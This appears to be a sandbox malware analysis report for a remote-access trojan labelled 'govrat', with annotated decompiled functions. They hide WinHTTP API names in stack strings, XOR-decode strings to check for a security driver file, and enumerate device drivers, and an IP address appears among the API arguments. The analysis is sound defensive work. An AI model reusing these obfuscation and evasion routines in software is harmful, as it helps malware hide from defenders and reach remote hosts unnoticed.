Code Analysis

Execution Graph

Execution Coverage: 8.8%
Dynamic/Decrypted Code Coverage: 0%
Signature Coverage: 5.5%
Total number of Nodes: 649
Total number of Limit Nodes: 35

Graph

The report's execution_graph is a flattened dump of node identifiers (20509 to 21145) and edges between them; it is summarised here rather than reproduced. Node addresses fall mostly in the 0x951000 to 0x9687b6 range, i.e. they are relative to the run-time image base 0x950000 listed under System Behavior, not to the on-disk image base 0x400000. Windows API calls that appear as graph nodes: CloseHandle, CreateFileW, CreateThread, ExitProcess, GetProcAddress (numerous nodes), K32EnumDeviceDrivers, K32GetDeviceDriverBaseNameW, ObjectStublessClient10, PathFileExistsW, PostMessageW, RtlExitUserThread, SendMessageW, SHParseDisplayName, Sleep, TlsGetValue, TlsSetValue. C run-time symbols recovered in the graph: __amsg_exit, __cftof2_l, __control87, ___crtGetStringTypeA, ___crtLCMapStringA, __freebuf, __getptd, __initterm_e, __input_s_l, __isalnum_l, __isdigit_l, __output_l, __woutput_l, __RTC_Initialize, __wcsicoll, __aulldvrm, _parse_cmdline, _strlen, _swscanf, _write_string, x_ismbbtype_l, _$I10_OUTPUT.
21117 958808 __control87 21117->21111 21135 958464 21118->21135 21120 952353 21121 958704 21120->21121 21143 a01fcc 21121->21143 21123 958712 RtlDecodePointer RtlDecodePointer 21124 958732 __input_s_l 21123->21124 21134 958784 21123->21134 21125 95874e 21124->21125 21127 958796 21124->21127 21124->21134 21128 95876e 21125->21128 21129 95875f 21125->21129 21126 95879f RtlEncodePointer RtlEncodePointer 21126->21134 21127->21126 21132 958768 21128->21132 21128->21134 21130 959022 8 API calls 21129->21130 21130->21132 21131 959022 8 API calls 21133 95877e 21131->21133 21132->21128 21132->21131 21132->21134 21133->21134 21134->21117 21136 958479 21135->21136 21138 95848b __amsg_exit 21135->21138 21141 9583a2 8 API calls 6 library calls 21136->21141 21138->21120 21139 95847f 21139->21138 21142 9525d6 8 API calls __amsg_exit 21139->21142 21141->21139 21144->21088 21145->21088 21146 95e5eb 21147 95e5ef 21146->21147 21148 95e61d __freebuf 21146->21148 21149 95e624 CloseHandle 21148->21149 21150 95e62e 21149->21150 21151 96062c CloseHandle 21152 95d184 CloseHandle 21151->21152 21153 96063f 21152->21153 21158 961f7b 9 API calls 21153->21158 21155 960660 21156 960507 ExitProcess 21155->21156 21157 960677 __freebuf 21155->21157 21156->21157 21158->21155 21159 96334d VariantInit 21160 9635f3 21159->21160 21161 9613c5 21163 9613ca 21161->21163 21162 9613f7 21163->21162 21164 95fac9 7 API calls 21163->21164 21165 961446 21164->21165 21166 9601fd 8 API calls 21165->21166 21167 961452 21166->21167 21168 95fb12 7 API calls 21167->21168 21169 96145e 21168->21169 21170 9602b6 15 API calls 21169->21170 21173 96147b 21169->21173 21172 961471 21170->21172 21171 960340 9 API calls 21171->21173 21172->21173 21174 9603c5 17 API calls 21172->21174 21173->21171 21175 961515 21173->21175 21176 961488 RtlExitUserThread 21173->21176 21177 95d184 CloseHandle 21173->21177 21178 960383 9 API calls 21173->21178 21179 9614b8 21173->21179 21174->21173 21176->21173 21177->21173 21178->21173 21180 95d184 
CloseHandle 21179->21180 21181 9614be 21180->21181 21182 96524e 7 API calls 21181->21182 21184 9614c5 21182->21184 21183 9614eb 21188 9614f7 PostMessageW PostMessageW 21183->21188 21184->21175 21184->21183 21185 96106c 16 API calls 21184->21185 21186 9614d8 21185->21186 21187 95d184 CloseHandle 21186->21187 21189 9614e4 21187->21189 21188->21175 21190 960bbc 9 API calls 21189->21190 21190->21183 21191 96125f 21192 961297 __cftof2_l 21191->21192 21193 95fd60 15 API calls 21192->21193 21194 96136c 21193->21194 21195 9510f7 8 API calls 21194->21195 21196 961398 __cftof2_l 21195->21196 21197 961520 21198 961533 21197->21198 21199 961583 21197->21199 21200 9615b5 21199->21200 21201 9615d4 21199->21201 21214 9615a3 21199->21214 21202 9615d9 21200->21202 21203 9615c2 CloseHandle 21200->21203 21201->21202 21205 9615e5 21201->21205 21215 96089d 15 API calls 21202->21215 21203->21202 21206 96160f 21205->21206 21209 961678 21205->21209 21205->21214 21207 961636 CloseHandle CloseHandle 21206->21207 21208 96161e 21206->21208 21210 961656 21207->21210 21211 961728 21209->21211 21209->21214 21212 961740 Sleep 21211->21212 21213 961749 Sleep 21211->21213 21212->21211 21213->21214 21215->21214 21216 9641c3 GetProcAddress GetDiskFreeSpaceExW 21217 9641e2 __freebuf 21216->21217 21218 951195 ___crtLCMapStringA 7 API calls 21217->21218 21219 9642af 21218->21219 21220 9650ab 21219->21220 21221 951000 8 API calls 21219->21221 21222 96502f 21221->21222 21223 951195 ___crtLCMapStringA 7 API calls 21222->21223 21224 965036 __freebuf 21223->21224 21225 953626 RtlEncodePointer RtlEncodePointer RtlEncodePointer RtlEncodePointer 21226 953659 21225->21226 21227 9536c0 21226->21227 21230 953663 RtlDecodePointer 21226->21230 21228 9536ad 21227->21228 21239 95329c TlsFree 21227->21239 21231 953672 21230->21231 21231->21227 21232 958fd6 __input_s_l Sleep 21231->21232 21233 953688 21232->21233 21233->21227 21234 953690 RtlDecodePointer 21233->21234 21235 9536a1 21234->21235 21235->21227 21236 9536a5 
21235->21236 21238 9532d9 8 API calls 2 library calls 21236->21238 21238->21228 21239->21228 21240 960762 21241 96078d 21240->21241 21242 9607fd GetProcAddress FindFirstFileA 21241->21242 21244 9607f6 21241->21244 21243 960823 21242->21243 21245 960827 21242->21245 21246 960889 GetProcAddress 21245->21246 21247 96087f 21245->21247 21248 960895 21246->21248 21247->21246 21248->21243 21249 963e83 GetProcAddress 21251 963e8e __amsg_exit 21249->21251 21250 963f24 GetProcAddress 21252 963f41 21250->21252 21251->21250 21253 951195 ___crtLCMapStringA 7 API calls 21252->21253 21256 9640a2 __amsg_exit 21252->21256 21253->21256 21254 951195 ___crtLCMapStringA 7 API calls 21255 964170 21254->21255 21256->21254 21257 9687ed 21258 9687f1 21257->21258 21259 9636c0 7 API calls 21258->21259 21265 968815 21259->21265 21260 96886b 21261 9603c5 17 API calls 21260->21261 21263 968872 21261->21263 21262 95c931 21 API calls 21262->21265 21264 95ee79 17 API calls 21264->21265 21265->21260 21265->21262 21265->21264 21266 95d184 CloseHandle 21265->21266 21266->21265 21267 961acf 21272 961abf 21267->21272 21268 961ada KiUserCallbackDispatcher 21269 961aeb 21268->21269 21268->21272 21270 961af3 RtlExitUserThread 21269->21270 21271 961b05 21269->21271 21270->21271 21271->21271 21272->21268 21286 95355d 21287 953563 21286->21287 21288 95356c GetProcAddress GetProcAddress GetProcAddress GetProcAddress 21286->21288 21292 95329c TlsFree 21287->21292 21291 9535b6 21288->21291 21290 953568 21292->21290 21273 95d775 21274 95d779 RegQueryValueExW 21273->21274 21284 95d71f __cftof2_l 21273->21284 21275 95d816 RegQueryValueExW 21274->21275 21274->21284 21276 95d8d9 21275->21276 21277 95d8e6 RegQueryValueExW 21275->21277 21276->21277 21276->21284 21278 95d95a __amsg_exit 21277->21278 21277->21284 21279 95d970 RegQueryValueExW 21278->21279 21281 95da28 21279->21281 21280 95dabf 21285 951d71 __input_s_l 7 API calls 21280->21285 21281->21280 21282 95da87 21281->21282 21283 951d71 __input_s_l 7 API calls 
21282->21283 21283->21284 21285->21284

    Executed Functions

    Control-flow Graph

    Control-flow graph of E00965B62 (rendered as an image in the report; edge list condensed): block 965b62-965bce (call 9ccff3) goes to 965ebe (return 0) when the module handle is null, otherwise to 965bd4-965e81 (GetProcAddress * 13). That block feeds a chain of twelve null checks at 965e83, 965e88, 965e8d, 965e92, 965e97, 965e9c, 965ea1, 965ea6, 965eab, 965eb0, 965eb5 and 965eb9; each exits to 965ebe on a null pointer, and the last continues to 965ec0-965ec5 (return 1). Twelve checks for thirteen resolved pointers: see the note above the final condition in the listing.
    C-Code - Quality: 99%
    			E00965B62(void* __ecx, _Unknown_base(*)()** __edi) {
    				short _t134;
    				short _t135;
    				short _t136;
    				short _t137;
    				short _t138;
    				short _t139;
    				struct HINSTANCE__* _t142;
    				void* _t143;
    				_Unknown_base(*)()* _t144;
    				_Unknown_base(*)()* _t146;
    				_Unknown_base(*)()* _t148;
    				_Unknown_base(*)()* _t150;
    				_Unknown_base(*)()* _t152;
    				_Unknown_base(*)()* _t154;
    				_Unknown_base(*)()* _t156;
    				_Unknown_base(*)()* _t158;
    				_Unknown_base(*)()* _t160;
    				_Unknown_base(*)()* _t162;
    				_Unknown_base(*)()* _t164;
    				_Unknown_base(*)()* _t166;
    				_Unknown_base(*)()* _t168;
    				intOrPtr* _t179;
    				void* _t181;
    
    				_t179 = _t181 - 0x78;
    				// The module name is built on the stack as UTF-16, one code unit at a time:
    				// 0x57 'W', 0x69 'i', 0x6e 'n', 0x48 'H', 0x74 't', 0x74 't', 0x70 'p', then a NUL,
    				// i.e. L"WinHttp". The name therefore never appears as a contiguous string in the image.
    				_t134 = 0x57;
    				 *((short*)(_t179 - 0xb4)) = _t134;
    				_t135 = 0x69;
    				 *((short*)(_t179 - 0xb2)) = _t135;
    				_t136 = 0x6e;
    				 *((short*)(_t179 - 0xb0)) = _t136;
    				_t137 = 0x48;
    				 *((short*)(_t179 - 0xae)) = _t137;
    				_t138 = 0x74;
    				 *((short*)(_t179 - 0xac)) = _t138;
    				 *((short*)(_t179 - 0xaa)) = _t138;
    				_t139 = 0x70;
    				 *((short*)(_t179 - 0xa8)) = _t139;
    				 *((short*)(_t179 - 0xa6)) = 0;
    				_push(_t179 - 0xb4);
    				_t142 = E009CCFF3(_t179 - 0xb4); // executed; takes L"WinHttp" and returns the module handle used by every GetProcAddress below (the loader wrapper itself is not part of this listing)
    				 *(_t179 + 0x74) = _t142;
    				if(_t142 == 0) {
    					L14:
    					_t143 = 0;
    				} else {
    					// Thirteen winhttp.dll export names follow, each assembled from little-endian
    					// 32-, 16- and 8-bit immediates ("WinH" = 0x486e6957, "ttpS" = 0x53707474, ...).
    					// The resolved pointers fill a 13-slot function table at __edi.
    					 *(_t179 - 8) = 0x486e6957;                // "WinH"
    					 *((intOrPtr*)(_t179 - 4)) = 0x53707474;   // "ttpS"
    					 *_t179 = 0x52646e65;                      // "endR"
    					 *((intOrPtr*)(_t179 + 4)) = 0x65757165;   // "eque"
    					 *((short*)(_t179 + 8)) = 0x7473;          // "st"
    					 *((char*)(_t179 + 0xa)) = 0;
    					_t144 = GetProcAddress(_t142, _t179 - 8); // executed: "WinHttpSendRequest"
    					 *__edi = _t144;                           // table[0x00]
    					 *(_t179 - 0xa4) = 0x486e6957;
    					 *((intOrPtr*)(_t179 - 0xa0)) = 0x47707474;
    					 *((intOrPtr*)(_t179 - 0x9c)) = 0x45497465;
    					 *((intOrPtr*)(_t179 - 0x98)) = 0x786f7250;
    					 *((intOrPtr*)(_t179 - 0x94)) = 0x6e6f4379;
    					 *((intOrPtr*)(_t179 - 0x90)) = 0x46676966;
    					 *((intOrPtr*)(_t179 - 0x8c)) = 0x7543726f;
    					 *((intOrPtr*)(_t179 - 0x88)) = 0x6e657272;
    					 *((intOrPtr*)(_t179 - 0x84)) = 0x65735574;
    					 *((short*)(_t179 - 0x80)) = 0x72;
    					_t146 = GetProcAddress( *(_t179 + 0x74), _t179 - 0xa4); // executed: "WinHttpGetIEProxyConfigForCurrentUser"
    					 *(__edi + 4) = _t146;                     // table[0x04]
    					 *(_t179 + 0x34) = 0x486e6957;
    					 *((intOrPtr*)(_t179 + 0x38)) = 0x53707474;
    					 *((intOrPtr*)(_t179 + 0x3c)) = 0x704f7465;
    					 *((intOrPtr*)(_t179 + 0x40)) = 0x6e6f6974;
    					 *((char*)(_t179 + 0x44)) = 0;
    					_t148 = GetProcAddress( *(_t179 + 0x74), _t179 + 0x34); // executed: "WinHttpSetOption"
    					 *(__edi + 8) = _t148;                     // table[0x08]
    					 *(_t179 + 0x20) = 0x486e6957;
    					 *((intOrPtr*)(_t179 + 0x24)) = 0x53707474;
    					 *((intOrPtr*)(_t179 + 0x28)) = 0x69547465;
    					 *((intOrPtr*)(_t179 + 0x2c)) = 0x756f656d;
    					 *((short*)(_t179 + 0x30)) = 0x7374;
    					 *((char*)(_t179 + 0x32)) = 0;
    					_t150 = GetProcAddress( *(_t179 + 0x74), _t179 + 0x20); // executed: "WinHttpSetTimeouts"
    					 *(__edi + 0xc) = _t150;                   // table[0x0c]
    					 *(_t179 - 0x60) = 0x486e6957;
    					 *((intOrPtr*)(_t179 - 0x5c)) = 0x52707474;
    					 *((intOrPtr*)(_t179 - 0x58)) = 0x69656365;
    					 *((intOrPtr*)(_t179 - 0x54)) = 0x65526576;
    					 *((intOrPtr*)(_t179 - 0x50)) = 0x6e6f7073;
    					 *((short*)(_t179 - 0x4c)) = 0x6573;
    					 *((char*)(_t179 - 0x4a)) = 0;
    					_t152 = GetProcAddress( *(_t179 + 0x74), _t179 - 0x60); // executed: "WinHttpReceiveResponse"
    					 *(__edi + 0x10) = _t152;                  // table[0x10]
    					 *(_t179 + 0x58) = 0x486e6957;
    					 *((intOrPtr*)(_t179 + 0x5c)) = 0x43707474;
    					 *((intOrPtr*)(_t179 + 0x60)) = 0x656e6e6f;
    					 *((short*)(_t179 + 0x64)) = 0x7463;
    					 *((char*)(_t179 + 0x66)) = 0;
    					_t154 = GetProcAddress( *(_t179 + 0x74), _t179 + 0x58); // executed: "WinHttpConnect"
    					 *(__edi + 0x14) = _t154;                  // table[0x14]
    					 *(_t179 + 0x68) = 0x486e6957;
    					 *((intOrPtr*)(_t179 + 0x6c)) = 0x4f707474;
    					 *((intOrPtr*)(_t179 + 0x70)) = 0x6e6570;   // "pen" plus the NUL in the top byte
    					_t156 = GetProcAddress( *(_t179 + 0x74), _t179 + 0x68); // executed: "WinHttpOpen"
    					 *(__edi + 0x18) = _t156;                  // table[0x18]
    					 *(_t179 + 0xc) = 0x486e6957;
    					 *((intOrPtr*)(_t179 + 0x10)) = 0x4f707474;
    					 *((intOrPtr*)(_t179 + 0x14)) = 0x526e6570;
    					 *((intOrPtr*)(_t179 + 0x18)) = 0x65757165;
    					 *((short*)(_t179 + 0x1c)) = 0x7473;
    					 *((char*)(_t179 + 0x1e)) = 0;
    					_t158 = GetProcAddress( *(_t179 + 0x74), _t179 + 0xc); // executed: "WinHttpOpenRequest"
    					 *(__edi + 0x1c) = _t158;                  // table[0x1c]
    					 *(_t179 - 0x48) = 0x486e6957;
    					 *((intOrPtr*)(_t179 - 0x44)) = 0x47707474;
    					 *((intOrPtr*)(_t179 - 0x40)) = 0x72507465;
    					 *((intOrPtr*)(_t179 - 0x3c)) = 0x4679786f;
    					 *((intOrPtr*)(_t179 - 0x38)) = 0x7255726f;
    					 *((short*)(_t179 - 0x34)) = 0x6c;
    					_t160 = GetProcAddress( *(_t179 + 0x74), _t179 - 0x48); // executed: "WinHttpGetProxyForUrl"
    					 *(__edi + 0x20) = _t160;                  // table[0x20]
    					 *(_t179 + 0x48) = 0x486e6957;
    					 *((intOrPtr*)(_t179 + 0x4c)) = 0x52707474;
    					 *((intOrPtr*)(_t179 + 0x50)) = 0x44646165;
    					 *((intOrPtr*)(_t179 + 0x54)) = 0x617461;
    					_t162 = GetProcAddress( *(_t179 + 0x74), _t179 + 0x48); // executed: "WinHttpReadData"
    					 *(__edi + 0x24) = _t162;                  // table[0x24]
    					 *(_t179 - 0x1c) = 0x486e6957;
    					 *((intOrPtr*)(_t179 - 0x18)) = 0x43707474;
    					 *((intOrPtr*)(_t179 - 0x14)) = 0x65736f6c;
    					 *((intOrPtr*)(_t179 - 0x10)) = 0x646e6148;
    					 *((short*)(_t179 - 0xc)) = 0x656c;
    					 *((char*)(_t179 - 0xa)) = 0;
    					_t164 = GetProcAddress( *(_t179 + 0x74), _t179 - 0x1c); // executed: "WinHttpCloseHandle"
    					 *(__edi + 0x28) = _t164;                  // table[0x28]
    					 *(_t179 - 0x30) = 0x486e6957;
    					 *((intOrPtr*)(_t179 - 0x2c)) = 0x51707474;
    					 *((intOrPtr*)(_t179 - 0x28)) = 0x79726575;
    					 *((intOrPtr*)(_t179 - 0x24)) = 0x64616548;
    					 *((intOrPtr*)(_t179 - 0x20)) = 0x737265;
    					_t166 = GetProcAddress( *(_t179 + 0x74), _t179 - 0x30); // executed: "WinHttpQueryHeaders"
    					 *(__edi + 0x2c) = _t166;                  // table[0x2c]
    					 *(_t179 - 0x7c) = 0x486e6957;
    					 *((intOrPtr*)(_t179 - 0x78)) = 0x41707474;
    					 *((intOrPtr*)(_t179 - 0x74)) = 0x65526464;
    					 *((intOrPtr*)(_t179 - 0x70)) = 0x73657571;
    					 *((intOrPtr*)(_t179 - 0x6c)) = 0x61654874;
    					 *((intOrPtr*)(_t179 - 0x68)) = 0x73726564;
    					 *((char*)(_t179 - 0x64)) = 0;
    					_t168 = GetProcAddress( *(_t179 + 0x74), _t179 - 0x7c); // executed: "WinHttpAddRequestHeaders"
    					 *(__edi + 0x30) = _t168;                  // table[0x30]
    					// As decompiled, the slot at __edi + 0x14 (WinHttpConnect) is the only one of the
    					// thirteen that is not null-checked here; the other twelve are.
    					if( *__edi == 0 ||  *(__edi + 4) == 0 ||  *(__edi + 8) == 0 ||  *(__edi + 0xc) == 0 ||  *(__edi + 0x10) == 0 ||  *(__edi + 0x18) == 0 ||  *(__edi + 0x1c) == 0 ||  *(__edi + 0x20) == 0 ||  *(__edi + 0x24) == 0 ||  *(__edi + 0x28) == 0 ||  *(__edi + 0x2c) == 0 || _t168 == 0) {
    						goto L14;
    					} else {
    						_t143 = 1;
    					}
    				}
    				return _t143;
    			}

    Statement addresses (in the original layout this column sits beside the listing, one entry per decompiled statement; 0x00000000 marks a statement, such as a goto, that has no instruction of its own):
    0x00965b63, 0x00965b70, 0x00965b73, 0x00965b7a, 0x00965b7d, 0x00965b84, 0x00965b87, 0x00965b8e, 0x00965b91, 0x00965b98,
    0x00965b99, 0x00965ba0, 0x00965ba9, 0x00965baa, 0x00965bb3, 0x00965bc0, 0x00965bc2, 0x00965bc9, 0x00965bce, 0x00965ebe,
    0x00965ebe, 0x00965bd4, 0x00965be0, 0x00965be7, 0x00965bee, 0x00965bf5, 0x00965bfc, 0x00965c02, 0x00965c05, 0x00965c07,
    0x00965c13, 0x00965c1d, 0x00965c27, 0x00965c31, 0x00965c3b, 0x00965c45, 0x00965c4f, 0x00965c59, 0x00965c63, 0x00965c6d,
    0x00965c73, 0x00965c75, 0x00965c7f, 0x00965c86, 0x00965c8d, 0x00965c94, 0x00965c9b, 0x00965c9e, 0x00965ca0, 0x00965caa,
    0x00965cb1, 0x00965cb8, 0x00965cbf, 0x00965cc6, 0x00965ccc, 0x00965ccf, 0x00965cd1, 0x00965cdb, 0x00965ce2, 0x00965ce9,
    0x00965cf0, 0x00965cf7, 0x00965cfe, 0x00965d04, 0x00965d07, 0x00965d09, 0x00965d13, 0x00965d1a, 0x00965d21, 0x00965d28,
    0x00965d2e, 0x00965d31, 0x00965d33, 0x00965d3d, 0x00965d44, 0x00965d4b, 0x00965d52, 0x00965d54, 0x00965d57, 0x00965d5e,
    0x00965d6c, 0x00965d73, 0x00965d7a, 0x00965d80, 0x00965d83, 0x00965d85, 0x00965d8f, 0x00965d96, 0x00965d9d, 0x00965da4,
    0x00965dab, 0x00965db2, 0x00965db8, 0x00965dba, 0x00965dc4, 0x00965dcb, 0x00965dd2, 0x00965dd9, 0x00965de0, 0x00965de2,
    0x00965dec, 0x00965df3, 0x00965dfa, 0x00965e01, 0x00965e08, 0x00965e0e, 0x00965e11, 0x00965e13, 0x00965e1d, 0x00965e24,
    0x00965e2b, 0x00965e32, 0x00965e39, 0x00965e40, 0x00965e42, 0x00965e4c, 0x00965e53, 0x00965e5a, 0x00965e61, 0x00965e68,
    0x00965e6f, 0x00965e76, 0x00965e79, 0x00965e7b, 0x00965e81, 0x00000000, 0x00965eb9, 0x00965ebb, 0x00965ebb, 0x00965e81,
    0x00965ec5

    APIs
    • GetProcAddress.KERNEL32(00000000,?,192.243.101.124,00000034,?,00000200), ref: 00965C05
    • GetProcAddress.KERNEL32(?,?), ref: 00965C73
    • GetProcAddress.KERNEL32(?,?), ref: 00965C9E
    • GetProcAddress.KERNEL32(?,?), ref: 00965CCF
    • GetProcAddress.KERNEL32(?,?), ref: 00965D07
    • GetProcAddress.KERNEL32(?,?), ref: 00965D31
    • GetProcAddress.KERNEL32(?,?), ref: 00965D52
    • GetProcAddress.KERNEL32(?,?), ref: 00965D83
    • GetProcAddress.KERNEL32(?,?), ref: 00965DB8
    • GetProcAddress.KERNEL32(?,?), ref: 00965DE0
    • GetProcAddress.KERNEL32(?,?), ref: 00965E11
    • GetProcAddress.KERNEL32(?,?), ref: 00965E40
    • GetProcAddress.KERNEL32(?,?), ref: 00965E79
    Strings
    Memory Dump Source
    • Source File: 00000001.00000002.13522191666.0000000000951000.00000020.sdmp, Offset: 00950000, based on PE: true
    • Associated: 00000001.00000002.13522181926.0000000000950000.00000002.sdmp
    • Associated: 00000001.00000002.13522276124.000000000096C000.00000002.sdmp
    • Associated: 00000001.00000002.13522298088.0000000000972000.00000004.sdmp
    • Associated: 00000001.00000002.13522386805.0000000000977000.00000020.sdmp
    • Associated: 00000001.00000002.13522767512.0000000000ACB000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_950000_govrat.jbxd

    Control-flow Graph

    Control-flow graph of E00960762 (rendered as an image in the report; edge list condensed): 960762-96078b, the self-loop 96078d-960796, 960798-9607c6 (call 9bff8a), the self-loop 9607c8-9607d1, then 9607d3-9607f4 (call 97f5e8), from which control goes either to 9607f6-9607fc (call 9e886a, early return) or to 9607fd-960821 (GetProcAddress, FindFirstFileA). From there 960823-960825 leads to the exit block 960898-96089c, while 960827-96083e continues through the self-loop 960840-960849, 96084b-960864, the self-loop 960866-96086f and 960871-96087d, optionally 96087f-960884 (call 9a502a), then 960889-960897 (GetProcAddress) to the exit. The four self-loops are the byte-wise XOR decode loops in the listing below.
    C-Code - Quality: 38%
    			E00960762(char __ebx, void* __ecx, void* __edx, void* __edi) {
    				void* _t51;
    				void* _t56;
    				void* _t59;
    				struct HINSTANCE__* _t61;
    				void* _t63;
    				void* _t64;
    				void* _t65;
    				struct HINSTANCE__* _t67;
    				_Unknown_base(*)()* _t68;
    				void* _t71;
    				CHAR* _t78;
    				intOrPtr* _t82;
    				intOrPtr* _t84;
    				CHAR* _t85;
    				void* _t88;
    
    				// Blob 1: 19 bytes at [frame-0x14], decoded in place with XOR key 0x65; it reads
    				// "\system32\drivers\". The byte at [frame-1] is a "decoded" flag: cleared before
    				// the loop (__ebx is used as a zero register here, see the "== __ebx" null tests
    				// below) and set to 1 once the loop has run.
    				 *((intOrPtr*)(_t88 - 5)) = 0x65391617;
    				 *((intOrPtr*)(_t88 - 9)) = 0x130c17;
    				 *((intOrPtr*)(_t88 - 0xd)) = 0x1395756;
    				 *((intOrPtr*)(_t88 - 0x11)) = 0x8001116;
    				 *((short*)(_t88 - 0x13)) = 0x1c16;
    				 *((char*)(_t88 - 0x14)) = 0x39;
    				 *((char*)(_t88 - 1)) = __ebx;
    				_t51 = 0;
    				do {
    					 *(_t88 + _t51 - 0x14) =  *(_t88 + _t51 - 0x14) ^ 0x00000065;
    					_t51 = _t51 + 1;
    				} while (_t51 < 0x13);
    				_pop(_t84);
    				L009BFF8A(_t51, __ebx, __ecx, __edi, _t84);
    				 *((char*)(_t88 - 1)) = 1;
    				 *_t84(_t88 - 0x130, _t88 - 0x14); // indirect call: writes the decoded fragment into the 0x130-byte path buffer (the string routine behind _t84 is not resolved in this listing)
    				// Blob 2: 10 bytes at [frame-0x21], XOR key 0x66; it reads "avckf.sys".
    				 *((intOrPtr*)(_t88 - 0x1b)) = 0x66151f15;
    				 *((intOrPtr*)(_t88 - 0x1f)) = 0x48000d05;
    				 *((short*)(_t88 - 0x21)) = 0x1007;
    				 *((char*)(_t88 - 0x17)) = __ebx;
    				_t56 = 0;
    				do {
    					 *(_t88 + _t56 - 0x21) =  *(_t88 + _t56 - 0x21) ^ 0x00000066;
    					_t56 = _t56 + 1;
    				} while (_t56 < 0xa);
    				 *((char*)(_t88 - 0x17)) = 1;
    				_t59 =  *_t84(_t88 - 0x130, _t88 - 0x21); // the buffer now ends in \system32\drivers\avckf.sys (plus whatever prefix it already held)
    				_pop(_t82);
    				L0097F5E8(_t59, __ebx, __edx, _t82);
    				_t85 = "kernel32";
    				_t61 =  *_t82(_t85); // indirect call returning the kernel32 module handle (resolver not shown)
    				if(_t61 == __ebx) {
    					_push(_t85);
    					return L009E886A(_t61, _t82);
    				}
    				GetProcAddress(_t61, "FindFirstFileA"); // executed; the returned pointer is not used in the decompiled code, FindFirstFileA is called directly below
    				_t78 = _t88 - 0x130;
    				_t63 = FindFirstFileA(_t78, _t88 - 0x270); // executed: probes for the driver file; WIN32_FIND_DATAA lives at [frame-0x270]
    				 *(_t88 - 0x28) = _t63;
    				if(_t63 != 0xffffffff) { // INVALID_HANDLE_VALUE: the file does not exist
    					// Blob 3: 10 bytes at [frame-0xb], XOR key 0x75; it reads "FindClose".
    					 *((intOrPtr*)(_t88 - 5)) = 0x7510061a;
    					 *((intOrPtr*)(_t88 - 9)) = 0x1936111b;
    					 *(_t88 - 0xb) = 0x1c33;
    					 *((char*)(_t88 - 1)) = __ebx;
    					_t64 = 0;
    					do {
    						 *(_t88 + _t64 - 0xb) =  *(_t88 + _t64 - 0xb) ^ 0x00000075;
    						_t64 = _t64 + 1;
    					} while (_t64 < 0xa);
    					 *((char*)(_t88 - 1)) = 1;
    					// Blob 4: 9 bytes at [frame-0x20], XOR key 0x75; it reads "kernel32".
    					 *((intOrPtr*)(_t88 - 0x1b)) = 0x75474619;
    					 *((intOrPtr*)(_t88 - 0x1f)) = 0x101b0710;
    					 *((char*)(_t88 - 0x20)) = 0x1e;
    					 *((char*)(_t88 - 0x17)) = __ebx;
    					_t65 = 0;
    					do {
    						 *(_t88 + _t65 - 0x20) =  *(_t88 + _t65 - 0x20) ^ 0x00000075;
    						_t65 = _t65 + 1;
    					} while (_t65 < 9);
    					 *((char*)(_t88 - 0x17)) = 1;
    					_t67 =  *_t82(_t88 - 0x20); // kernel32 handle again, now from the decoded name
    					if(_t67 == __ebx) {
    						_push(_t88 - 0x20);
    						_push(_t78);
    						_t67 = L009A502A(_t88 - 0x20, _t82);
    					}
    					_t68 = GetProcAddress(_t67, _t88 - 0xb); // resolves FindClose by its decoded name
    					 *_t68( *(_t88 - 0x28)); // FindClose(hFind)
    					_t71 = 1; // the driver file exists
    				} else {
    					_t71 = 0;
    				}
    				return _t71;
    			}

    Statement addresses (in the original layout this column sits beside the listing, one entry per decompiled statement; 0x00000000 marks a statement that has no instruction of its own):
    0x00960762, 0x00960769, 0x00960770, 0x00960777, 0x0096077e, 0x00960784, 0x00960788, 0x0096078b, 0x0096078d, 0x0096078d,
    0x00960792, 0x00960793, 0x00960798, 0x00960799, 0x009607a9, 0x009607ad, 0x009607af, 0x009607b6, 0x009607bd, 0x009607c3,
    0x009607c6, 0x009607c8, 0x009607c8, 0x009607cd, 0x009607ce, 0x009607de, 0x009607e2, 0x009607e4, 0x009607e5, 0x009607ea,
    0x009607f0, 0x009607f4, 0x009607f6, 0x00000000, 0x009607f7, 0x00960809, 0x00960812, 0x00960819, 0x0096081b, 0x00960821,
    0x00960827, 0x0096082e, 0x00960835, 0x0096083b, 0x0096083e, 0x00960840, 0x00960840, 0x00960845, 0x00960846, 0x0096084b,
    0x0096084f, 0x00960856, 0x0096085d, 0x00960861, 0x00960864, 0x00960866, 0x00960866, 0x0096086b, 0x0096086c, 0x00960875,
    0x00960879, 0x0096087d, 0x00960882, 0x00960883, 0x00960884, 0x00960884, 0x0096088e, 0x00960893, 0x00960897, 0x00960823,
    0x00960823, 0x00960823, 0x0096089c

    APIs
    • GetProcAddress.KERNEL32(00000000,FindFirstFileA), ref: 00960809
    • FindFirstFileA.KERNELBASE(?,?), ref: 00960819
    • GetProcAddress.KERNEL32(00000000,00000075), ref: 0096088E
    Strings
    Memory Dump Source
    • Source File: 00000001.00000002.13522191666.0000000000951000.00000020.sdmp, Offset: 00950000, based on PE: true
    • Associated: 00000001.00000002.13522181926.0000000000950000.00000002.sdmp
    • Associated: 00000001.00000002.13522276124.000000000096C000.00000002.sdmp
    • Associated: 00000001.00000002.13522298088.0000000000972000.00000004.sdmp
    • Associated: 00000001.00000002.13522386805.0000000000977000.00000020.sdmp
    • Associated: 00000001.00000002.13522767512.0000000000ACB000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_950000_govrat.jbxd

    Control-flow Graph

    Control-flow graph of E0095FE2E (rendered as an image in the report; edge list condensed): 95fe2e-95fe55, the self-loop 95fe57-95fe60, 95fe62-95fea7 (GetProcAddress), the self-loop 95fea9-95feb2, then 95feb4-95fec5 (GetProcAddress). A null pointer goes to 95ff3a and the exit 95ff3c-95ff40; otherwise 95fecb-95fedd (K32EnumDeviceDrivers), 95fedf-95fee8 (call 95c795) and 95feea-95fef7 (K32EnumDeviceDrivers) lead, via 95fef9-95ff01, into the loop 95ff03-95ff17 (K32GetDeviceDriverBaseNameW) with 95ff19-95ff2c (call 951c05) and 95ff2e-95ff31 (index increment) feeding back into it. 95ff33-95ff39 (call 95115b) goes to 95ff3a, and the match path 95ff41-95ff4b (call 95115b) goes straight to the exit. The two self-loops are the XOR decode loops in the listing below.
    C-Code - Quality: 87%
    			E0095FE2E(struct HINSTANCE__* __eax, signed int __ebx) {
    				void* _t45;
    				_Unknown_base(*)()* _t47;
    				void* _t48;
    				_Unknown_base(*)()* _t50;
    				void* _t51;
    				void* _t62;
    				signed int _t65;
    				void* _t67;
    				void* _t71;
    				struct HINSTANCE__* _t72;
    				void* _t74;
    				void* _t79;
    
    				_t65 = __ebx;
